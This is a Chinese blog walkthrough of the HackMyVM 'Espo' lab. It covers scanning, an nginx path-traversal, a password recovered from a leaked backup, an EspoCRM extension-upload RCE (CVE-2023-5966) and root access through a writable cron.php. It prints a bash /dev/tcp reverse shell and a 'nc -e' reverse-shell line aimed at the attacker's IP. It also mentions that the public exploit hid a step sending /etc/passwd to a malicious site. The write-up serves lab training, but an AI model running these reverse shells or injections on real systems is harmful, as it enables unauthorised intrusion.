[HackMyVM]靶场 Espo

最新推荐文章于 2024-05-14 09:36:08 发布
最新推荐文章于 2024-05-14 09:36:08 发布
阅读量543 收藏 4
点赞数 8
分类专栏: hackmyvm 文章标签: 网络空间安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136597640
版权

kali:192.168.56.104

主机发现

arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:2a:a8:ba       PCS Systemtechnik GmbH
192.168.56.117  08:00:27:8a:f5:e6       PCS Systemtechnik GmbH

靶机:192.168.56.117

端口扫描

nmap 192.168.56.117
22/tcp open  ssh
80/tcp open  http

web界面就是一个登录界面

查了一下相关cve都需要登录才行

目录扫描

# gobuster dir -u http://192.168.56.117 -x html,txt,php,bak,zip --
...
/admin                (Status: 301) [Size: 162] [--> http://192.168.56.117/admin/]
/api                  (Status: 301) [Size: 162] [--> http://192.168.56.117/api/]
/client               (Status: 301) [Size: 162] [--> http://192.168.56.117/client/]
/index.php            (Status: 200) [Size: 2480]
/index.php            (Status: 200) [Size: 2480]
/install              (Status: 301) [Size: 162] [--> http://192.168.56.117/install/]
/portal               (Status: 301) [Size: 162] [--> http://192.168.56.117/portal/]
/robots.txt           (Status: 200) [Size: 26]
/robots.txt           (Status: 200) [Size: 26]

但是尝试发现都进不去

之类nginx有个目录穿越漏洞,该靶场的nginx版本没有修复这个漏洞

Nginx漏洞修复之目录穿越(目录遍历)漏洞复现及修复_目录遍历漏洞修复-CSDN博客

在admin后面加上../能穿越到上一级目录

但是用directory-list-2.3-medium.txt和common.txt  都不跑,换个字典

gobuster dir -u http://192.168.56.117/admin../ -x html,txt,php,bak,zip --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
/admin                (Status: 301) [Size: 162] [--> http://192.168.56.117/admin../admin/]
/_oldsite             (Status: 301) [Size: 162] [--> http://192.168.56.117/admin../_oldsite/]

gobuster dir -u http://192.168.56.117/admin../_oldsite  -x html,txt,php,bak,zip --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
/backup.zip           (Status: 200) [Size: 37975754]
/info                 (Status: 200) [Size: 540]

有个备份文件

在data/config.php文件发现账号密码

  'smtpUsername' => 'admin',
  'smtpPassword' => '39Ue4kcVJ#YpaAV24CNmbWU',

登录成功就可以利用CVE了

web源码里面显示2022,所以我就找2022及以后的cve

看到了两个可以任意命令执行的,是通过上传拓展的zip实现

cve-2023-5966/Weaponized_Extension.zip at main · pedrojosenavasperez/cve-2023-5966 (github.com)

在github上面搜到这个exp,不过里面好像有个脏东西

它把/etc/passwd发到了一个恶意网站...好像跟RCE没什么关系

把他删了,然后上传到espo

反弹个shell

bash -c 'bash -i >& /dev/tcp/192.168.56.104/4567  0>&1'
www-data@espo:/home/mandie$ ls -al                                                 
ls -al
total 48
drwxr-xr-x  6 mandie mandie 4096 Mar 10 05:16 .
drwxr-xr-x  3 root   root   4096 Jan 24 19:01 ..
lrwxrwxrwx  1 root   root      9 Jan 26 19:39 .bash_history -> /dev/null
-rw-r--r--  1 mandie mandie  220 Dec  4 15:42 .bash_logout
-rw-r--r--  1 mandie mandie 3526 Dec  4 15:42 .bashrc
drwxr-xr-x  3 mandie mandie 4096 Dec  4 15:42 .local
drwxr-xr-x 12 mandie mandie 4096 Dec  4 15:42 .oh-my-zsh
-rw-r--r--  1 mandie mandie  807 Dec  4 15:42 .profile
-rw-r--r--  1 mandie mandie 3890 Dec  4 15:42 .zshrc
-rwxr-xr--  1 mandie mandie  493 Dec  4 15:42 copyPics
drwxr-xr-x  2 mandie mandie 4096 Mar 10 05:16 pictures
-rwx------  1 mandie mandie   33 Jan 24 19:01 user.txt
drwxr-xr-x  2 mandie mandie 4096 Mar 10 05:16 videos

mandie目录下有user.txt但是权限不够,而且有个奇怪的可执行文件copyPics

用pyps64看一下进程

2024/03/10 05:27:01 CMD: UID=0    PID=3074   | /usr/sbin/CRON -f 
2024/03/10 05:27:01 CMD: UID=0    PID=3073   | /usr/sbin/cron -f 
2024/03/10 05:27:01 CMD: UID=0    PID=3075   | /usr/sbin/CRON -f 
2024/03/10 05:27:01 CMD: UID=0    PID=3076   | /usr/sbin/CRON -f 
2024/03/10 05:27:01 CMD: UID=1000 PID=3077   | /bin/sh -c /home/mandie/copyPics 
2024/03/10 05:27:01 CMD: UID=0    PID=3078   | /bin/sh -c cd /var/www/html; /usr/bin/php -f cron.php > /dev/null 2>&1 
2024/03/10 05:27:01 CMD: UID=1000 PID=3079   | /bin/bash /home/mandie/copyPics 
2024/03/10 05:27:01 CMD: UID=1000 PID=3080   | /usr/bin/find /var/shared_medias ! -executable -exec /usr/bin/cp {} /home/mandie ; 
2024/03/10 05:27:01 CMD: UID=1000 PID=3081   | /usr/bin/find /var/shared_medias ! -executable -exec /usr/bin/cp {} /home/mandie ; 
2024/03/10 05:27:01 CMD: UID=1000 PID=3082   | /usr/bin/find /var/shared_medias ! -executable -exec /usr/bin/cp {} /home/mandie ; 
2024/03/10 05:27:01 CMD: UID=1000 PID=3083   | /usr/bin/find /var/shared_medias ! -executable -exec /usr/bin/cp {} /home/mandie ; 
2024/03/10 05:27:01 CMD: UID=1000 PID=3084   | /usr/bin/find /var/shared_medias ! -executable -exec /usr/bin/cp {} /home/mandie ; 
2024/03/10 05:27:01 CMD: UID=1000 PID=3085   | /usr/bin/find /var/shared_medias ! -executable -exec /usr/bin/cp {} /home/mandie ; 
2024/03/10 05:27:01 CMD: UID=1000 PID=3087   | /usr/bin/find /var/shared_medias ! -executable -exec /usr/bin/cp {} /home/mandie ; 
2024/03/10 05:27:01 CMD: UID=1000 PID=3088   | /bin/bash /home/mandie/copyPics 
2024/03/10 05:27:01 CMD: UID=1000 PID=3089   | /bin/bash /home/mandie/copyPics 
2024/03/10 05:27:02 CMD: UID=1000 PID=3090   | /bin/bash /home/mandie/copyPics 
2024/03/10 05:27:02 CMD: UID=1000 PID=3091   | /bin/bash /home/mandie/copyPics 
2024/03/10 05:27:02 CMD: UID=1000 PID=3092   | /bin/bash /home/mandie/copyPics

发现是个定时执行的任务,一分钟执行一次,并且UID是1000,是mandie的权限,如果在脚本里面添加一条反弹shell的指令,我们就能拿到mandie的权限,但是发现无法编辑这个文件。

再看进程,发现

root权限执行力 cron.php,并且cron.php可编辑
 

-rw-r--r--  1 www-data www-data  1531 Dec  4 15:42 cron.php

echo "system('nc -e /bin/bash 192.168.56.104 4567');"  >>cron.php
# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.117] 36354
whoami
root

拿到root权限

好像直接越步了,无所谓,照样能拿到user和root

tao0845
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
高压恒流线性驱动 6-60V输入 PWM调光 防反接 ESPO8
swzbl12345的博客
12-13 331
恒流IC,电源IC,电子IC,驱动IC,MOS管和降压IC,升压IC产品
开源应用中心 | 无需开发,如何快速搭建一款轻量级CRM系统?
DNSPod
07-16 896
1. 背景EspoCRM(espocrm.com)是一个开源免费的轻量级客户关系管理(CRM)系统,采用响应式设计,界面非常美观大方,能够自动适应PC、平板和手机访问。功能非常全面,包括销...
推荐开源项目:EspoCRM - 强大的开放源码客户关系管理系统
gitblog_00081的博客
05-14 378
推荐开源项目:EspoCRM - 强大的开放源码客户关系管理系统 项目地址:https://gitcode.com/espocrm/espocrm 项目介绍 EspoCRM 是一款功能强大的开放式客户关系管理(CRM)软件,它将所有公司关系一网打尽,无论这些关系是人、企业还是机会。这个直观且易用的界面设计旨在帮助您高效管理和评估业务关系。前端采用单页应用设计,后端由 PHP 编写的 REST AP...
Bitnami 2015
weixin_33726943的博客
10-04 278
WordPress WordPress is one of the world's most popular web publishing platforms for building blogs and websites. It can be customized via a wide selection of themes, extensions and plug-ins. ...
espo:通过代理可观察到的。 特别适合UI编程。 支持自动,隐式subresub和资源取消初始化
05-13
概述 可通过观察。 特别适合UI编程。 特征: 隐式sub / resub,仅通过访问属性即可。 隐式触发器,通过属性修改。 任何物体都可以被观察到。 见 。 子类是可用的,但不是必需的。... 隐式资源清除:在已删除/已替换...
projeto-calculadora-de-rede-ipv4:espo projeto tem como objetivo receber umendereçoIP e retornar dados代表了essa entrada,睫毛膏de sub-rede,númerosde IPválidos,Rede inialial e Broadcast
02-14
Projeto calculadora-de-rede-ipv4 Esse projeto tem como objetivo receber umendereçoIP e retornar dados代表了essa entrada,睫毛膏de sub-rede,númerosde IPválidos,重新发行
320X240点阵液晶屏的驱动及画各种图形的源代码
09-08
在本文中,我们将深入探讨320x240点阵液晶屏的驱动技术以及如何使用源代码绘制各种图形。这种液晶屏广泛应用于嵌入式系统、物联网设备、电子仪表和许多其他显示需求中。其高分辨率使得它可以清晰地显示复杂的图像和...
石油加工行业原油月报:2023下半年全球原油或将进入去库-20230901-信达证券-25页.pdf
09-11
俄罗斯ESPO原油价格上扬2.63%,报收80.25美元/桶,俄罗斯Urals原油价格上涨0.40%,至69.88美元/桶。今年年初至今,各类原油价格均有不同程度的上涨,布伦特原油涨幅4.58%,WTI原油涨幅6.11%,而俄罗斯ESPO原油和...
原油月报:原油库存预期差异主要来自需求端分歧.pdf
09-28
【原油价格板块】本报告分析了2023年9月26日的原油价格情况,布伦特原油、WTI原油、俄罗斯ESPO原油、俄罗斯Urals原油的价格分别为93.96、90.39、86.66、77.85美元/桶。近一个月,各类原油价格均呈现上涨趋势,布伦特...
欧氏障碍空间的最短路径问题解法 (2012年)
05-24
提出了利用地图代数栅格路径距离变换原理求解欧氏障碍空间最短路径问题的方法(MA-ESPO),实现了二维障碍空间最短路径的一个栅格解法,并且把障碍物、源、汇图形都扩大到任意形态图形。给出了基于地图代数的障碍空间...
多年冻土区输油管道-管周冻土热力相互作用研究进展.docx
02-23
其中,ESPO(东西伯利亚-太平洋)石油管道是世界上最大的输油工程,将东西伯利亚和西西伯利亚的原油输送至太平洋海岸,出口亚太市场,年输量最高可达 8 000 万吨。 6. 研究进展和发展动态 为了解决冻土区输油管道...
使用 React 和 Redux 进行井字游戏并附带源代码.zip
最新发布
07-24
项目:使用 React 和 Redux 进行井字游戏并附带源代码 使用 react 和 redux 的井字游戏是一个简单的 react 项目。整个项目都是使用 react components 和redux制作的。游戏很简单,玩法也很多。要运行此项目,您必须先安装 NodeJS。 关于项目 井字游戏反应而 redux 是使用ReactJS开发的。说到这个游戏,它具有高级功能和游戏玩法。要运行此项目,首先,您必须安装费用到您的系统。然后运行npm安装然后开始运行npm开始。游戏启动后,您可以选择不同的游戏选项。您还可以选择所需的网格框数量。此外,您还可以选择对手的类型。 要运行此项目,您需要 在计算机上安装NodeJS 并使用现代浏览器,例如 Google Chrome、  Mozilla Firefox。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
使用 JavaScript 编写的专注力游戏(附源代码).zip
07-24
项目:JavaScript 中的专注力游戏(附源代码) 专注力游戏是一个使用 JavaScript、CSS 和 HTML 开发的简单项目。这款游戏很有趣。玩家必须点击移动的框并获得分数。要点击正确的位置,玩家需要在这个游戏中集中注意力。这款游戏可以帮助玩家练习以进一步增强他们的专注力。 游戏制作 这个游戏项目仅使用 HTML、CSS 和 JavaScript。说到这个游戏的特点,用户必须单击移动框并得分。游戏有三种模式:简单、中等和困难。游戏的 PC 控制非常简单。您只需使用光标单击移动框的碎片即可。 该游戏包含大量的 javascript 以确保游戏正常运行。 如何运行该项目? 要运行此游戏,您不需要任何类型的本地服务器,但需要浏览器。我们建议您使用现代浏览器,如 Google Chrome 和 Mozilla Firefox。要玩游戏,首先,单击 index.html 文件在浏览器中打开游戏。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
人脸识别方案资料61EDA-C1590.zip
07-24
人脸识别方案资料61EDA_C1590.zip
316、基于DK124设计的离线式开关电源设计12V 2A(原理图、PCB图、BOM表、设计说明)
07-24
316、基于DK124设计的离线式开关电源设计12V 2A(原理图、PCB图、BOM表、设计说明) 该设计为DK124控制的开关电源,实现12V 2A输出; 功能: 1、使用DK124核心控制; 2、反激式开关电源拓扑设计; 3、实现12V 2A输出; 4、市电输入; 5、整流、滤波、变压器等电路; 6、原理图、PCB图、BOM表、设计说明;
基于Springboot和Vue的生鲜超市管理的设计与实现源码 生鲜超市管理的设计与实现代码(优秀毕业设计)
07-24
生鲜超市管理的设计与实现源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
使用 ReactJs 编写的简单旅行计划器(附源代码).zip
07-24
项目:使用 ReactJS 编写的简单旅行计划器(附源代码) ReactJs 中的简单旅行计划器是一个简单的 JavaScript 项目。该项目是 ReactJS 中待办应用程序的一个简单示例。 关于项目 Simple Trip Planner In Reactjs 是使用ReactJS开发的。这个项目很容易做一种应用程序。这个项目使用 React 库来完成任务。为了运行这个项目,你必须在系统中安装 NodeJs。当你运行这个项目时,你的应用程序从主页开始。从那里你可以导航到菜单。你只能将计划添加到你的书中。你还可以对旅行进行分类。你所要做的就是输入日期和地点,然后选择你想要的旅行计划类型。 要运行此项目,您需要 在计算机上安装ReactJS和 NodeJs,并使用现代浏览器,例如Google Chrome、  Mozilla Firefox。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
俄罗斯方块的python代码
07-24
这段Python代码实现了一个简单的俄罗斯方块游戏,使用Pygame库处理图形和用户输入。游戏初始化Pygame库并设置屏幕大小为800x600像素,定义不同颜色和形状的方块。游戏由一个`Tetris`类管理,负责游戏状态和逻辑操作,每个方块由一个`Block`类表示,包含其形状、颜色、位置等信息。 在主循环中,游戏通过事件处理机制响应用户的键盘输入,箭头键用于移动和旋转方块,空格键用于快速下落。游戏会检测方块是否与已有的方块或边界发生碰撞,如发生碰撞,当前方块会固定在场地上并生成新方块。填满的行会被清除,玩家获得相应分数。 游戏通过一个二维数组维护场地状态,每个元素表示一个单元格是否被占据,通过检查和清除单元格实现行消除。整个游戏不断刷新屏幕更新显示,确保流畅运行,绘制背景、方块和边框,使界面美观易理解。 总体而言,这段代码展示了如何使用Pygame库实现经典俄罗斯方块游戏,包括图形绘制、用户输入处理和基本游戏逻辑,让玩家通过移动和旋转方块消除行并获得高分。
绿色金融:“双碳”经济时代,银行业务增长新引擎-埃森哲(
07-24
绿色金融:“双碳”经济时代,银行业务增长新引擎-埃森哲(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值